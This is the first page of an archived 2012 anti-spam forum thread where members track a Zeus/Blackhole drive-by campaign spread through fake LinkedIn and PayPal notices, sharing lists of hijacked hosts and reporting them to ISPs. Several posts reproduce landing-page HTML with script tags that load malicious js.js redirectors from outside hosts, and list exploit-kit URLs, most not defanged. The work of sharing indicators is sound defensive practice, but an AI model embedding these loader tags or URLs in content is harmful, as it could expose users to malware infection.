Clicky
Last visit was: Fri Jul 04, 2014 8:12 pm
It is currently Fri Jul 04, 2014 8:12 pm

Numerous malware drive by attempts


All times are UTC - 5 hours [ DST ]


 [ 38 posts ]  Go to page 1, 2, 3  Next
Author Message
 PostPosted: Thu Mar 22, 2012 6:18 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
In the past three weeks I've seen a sudden rush of all manner of fake notification pushing urls of hijacked servers which attempt to perform several types of malware exploitations.

The messages are always the same kind of format:

- Fake notification from a company. Lately it's been mostly Linkedin notices (some fake person needing a recommendation, etc.)
- Several links each claiming to be for a different thing (Read more, contact us, unsubscribe)
- Each link is a distinct hijacked server.

The hijacked servers always have a randomly named subdirectory and an index file, e.g.:

Code:
http://acte-firma-offshore.ro/Nfy7BLd8/index.html

When you go to one of the hijacked server links, you see a message that says "WAIT PLEASELoading...".

If you view source on these individual pages, you see a string of *other* hijacked servers are supplying the malicious JavaScript code:

Code:
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://mrsmakeit.com/9jrgDjED/js.js"></script>
<script type="text/javascript" src="http://myparacord.com/cxW8X8xp/js.js"></script>
<script type="text/javascript" src="http://thebestguide1.com/arKwG4pE/js.js"></script>
<script type="text/javascript" src="http://www.extrhema.com.br/cVspcegd/js.js"></script>
<script type="text/javascript" src="http://www.industriacaxiense.com.br/HLAeMSAd/js.js"></script>

</html>

Again: randomly named directory and a js file.

So there's an automated process out there that's doing this to (so far) dozens of unsecured, abandoned, long forgotten websites.

So far this week I have reported 53 servers, covering the whole gamut of the hijacked servers. Many of these are completely abandoned or hosted by really obscure, what I refer to as "unmanned" ISP's. No contact address works for some of them, or the ones that do go unanswered. I'd say I'm at about a 40% success rate for getting this suspended or secured.

I've created a really basic tool called the Phishing ReporterAtor™ which certainly makes life easier, but there's got to be some better way of notifying these ISP's and hosting companies that criminals have pwned a large number of their servers.

Having said all of this: none of these messages make it past any spam filter at all, via numerous email providers. (Gmail, Yahoo, etc.) So I have to question the overall success of this malware campaign.

Mostly fyi for now but this is becoming an epidemic.

SiL


Top
 Profile  
 PostPosted: Thu Mar 22, 2012 10:34 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
"this is becoming an epidemic"

I attempted to describe some of the malware campaign here:
http://www.mywot.com/en/forum/21464-qai ... -2010-1885

The patterns of the malicious URLs (deceptive landing page, intermediate JavaScript, malware payload) have been easy to spot so far.


Top
 Profile  
 PostPosted: Fri Mar 23, 2012 12:24 am   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8 random character string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)

Code:
futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
www.andif.com.br
www.damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
www.dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
www.elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
www.eventakustik.de
www.eurowire.it
aashirwad.com.hk
www.fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
www.izaz.com.br
www.hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
www.kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
www.barcuta.ro
www.artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
www.autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
www.cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
www.ismailgunes.web.tr
www.gastrocomplexeu.pl
www.bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
www.wahbischool.com
www.kemerburgazfutbolokulu.com
www.gruppoenter.eu
www.dimac.com.ar
www.cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br


SIL, let me now if you need the full URLs for reporting.


Top
 Profile WWW  
 PostPosted: Fri Mar 23, 2012 10:51 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Red Dwarf wrote:
SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL


Top
 Profile  
 PostPosted: Fri Mar 23, 2012 10:55 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL


Top
 Profile  
 PostPosted: Fri Mar 23, 2012 2:34 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
As lame as these appear when they're from the wrong bank, I'm sure they hit lots of people who do use the bank being spoofed, and maybe even a few who share access to an account with the sort of person who needs to do a lot of password resets.


Top
 Profile  
 PostPosted: Fri Mar 23, 2012 3:59 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
spamislame wrote:
Red Dwarf wrote:
SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL

1,500 URLs from the past 3 days sent.
:silthumb: < = silthumb!


Top
 Profile WWW  
 PostPosted: Fri Mar 23, 2012 4:22 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
spamislame wrote:
Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL


garwarner wrote:
In the very most recent of these "BlackHole to Zeus" malware campaigns, LinkedIn is being imitated. The LinkedIn invitation claims to be from "Your classmate", but guess what happens if you click one of the 820 advertised URLs, each disguised as your "friend's" name?

Yes, it loads several redirectors, and then sends them to a Black Hole Exploit kit that infects the visitor with Zeus!

The format matches exactly, a hacked web server, a random 8-character string, index.html (techie grep pattern "/......../index.html")
garwarner wrote:
promocaolilicaetigor.com.br / VJBqqR5H / index.html

BTW, in that particular example - The requested URL /VJBqqR5H was not found on this server.


Top
 Profile WWW  
 PostPosted: Fri Mar 23, 2012 4:44 pm   
You are kiillllling-a my bizinisss!
User avatar

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
Here are some of the js.js second level URLs. The usual warnings apply - do not load these
Code:
<script type="text/javascript" src="http://boemelparty.be/vnB4GozT/js.js"></script>
<script type="text/javascript" src="http://bscert.eu/CAgADsB0/js.js"></script>
<script type="text/javascript" src="http://chroniquesradios.com/7KnKEoKm/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/cJHrkMSb/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/Th5Da66c/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/YfTXsaR5/js.js"></script>
<script type="text/javascript" src="http://www.frogeen.com/hPPP5CqE/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/H5WkxY8X/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/8cACpVEr/js.js"></script>


The domains / web servers are
Quote:
boemelparty.be
bscert.eu
chroniquesradios.com
nhb.prosixsoftron.in
sas.hg.pl
hXXp://www.alpine-turkey.com
hXXp://www.frogeen.com
hXXp://www.thedugoutdawgs.com
hXXp://www.vinhthanh.com.vn


[EDIT] More added


Top
 Profile WWW  
 PostPosted: Fri Mar 23, 2012 5:26 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
I reported around 50 of these so far (both the js.js hosts and the /#########/index.html hosts)

SiL


Top
 Profile  
 PostPosted: Thu Mar 29, 2012 5:29 am   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment (or just before I posted this) at

hXXp://50.116.50.82/showthread.php?t=d7ad916d1c0396ff


Last edited by NotBuyingIt on Thu Apr 05, 2012 12:37 pm, edited 1 time in total.

Top
 Profile  
 PostPosted: Thu Mar 29, 2012 10:10 am   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
NotBuyingIt wrote:
I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment

...

Or rather: was. :twisted:

SiL


Top
 Profile  
 PostPosted: Thu Mar 29, 2012 12:49 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
spamislame wrote:
Or rather: was. :twisted:

Ah! The botnet domain clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its registrar MONIKER ONLINE SERVICES, INC has set its status to clientHold. Its DNS (monikerdns.net) continues to associate it with IP 50.116.50.82 on the Linode Network in the USA; however the server at that IP address appears to have gone offline. :silthumb:

It may be productive to examine any similarly named domains which were created near the same time as clearschooner.com


Top
 Profile  
 PostPosted: Sat Mar 31, 2012 11:35 am   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
I believe that the following article refers to some of these drive-by attempts

http://garwarner.blogspot.com/2012/03/u ... lware.html

Canadian translation:

http://garwarner.blogspot.ca/2012/03/us ... lware.html

(Note: The blog will not render properly on an iPad.)


Top
 Profile  
 PostPosted: Thu Apr 05, 2012 12:32 pm   
Spammer Killing Machine
User avatar

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
These deceptive URLs (presumably found in spam that, I am guessing, are spoofs of PayPal in this case)

    aluguelciroimoveis.com.br/9ZT4hYfA/index.html
    eltekmuhendislik.com/PX34vf6P/index.html
    erinteltelekom.com.tr/2qkQiMnF/index.html
    estutrans.co.id/zSfdvN78/index.html
    homeartbornova.com/ZQe8w6UJ/index.html

all link to web pages that are coded to load several of these "intermediate" JavaScript files at at time

    demo.auctionsiteforlease.com/u8J3B832/js.js
    guzel-macrame.com/mNv2hTDq/js.js
    osakaledpanel.com/NSAPcnkz/js.js
    scoalapelinie.scienceontheweb.net/AdbZZbva/js.js
    travelhelper.biz/PBzpAEjg/js.js
    usmedicalit.com/ebv60BkK/js.js
    www.walscape.com/Bi7L9NvW/js.js
    yesconvites.com/JcCFzYq7/js.js

The intermediate scripts redirect to a malicious website such as

    50.116.35.146/showthread.php?t=73a07bcb51f4be71
    209.59.218.94/showthread.php?t=73a07bcb51f4be71

The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revisions of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

[Edit: Add] Today, Dmitry Tarakanov of Kaspersky Lab Poland is using the term polymorphism to generally characterize the frequent code changes in the current set of Zeus malware campaigns.
See http://www.viruslist.pl/weblog.html?weblogid=785


Top
 Profile  
 [ 38 posts ]  Go to page 1, 2, 3  Next

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008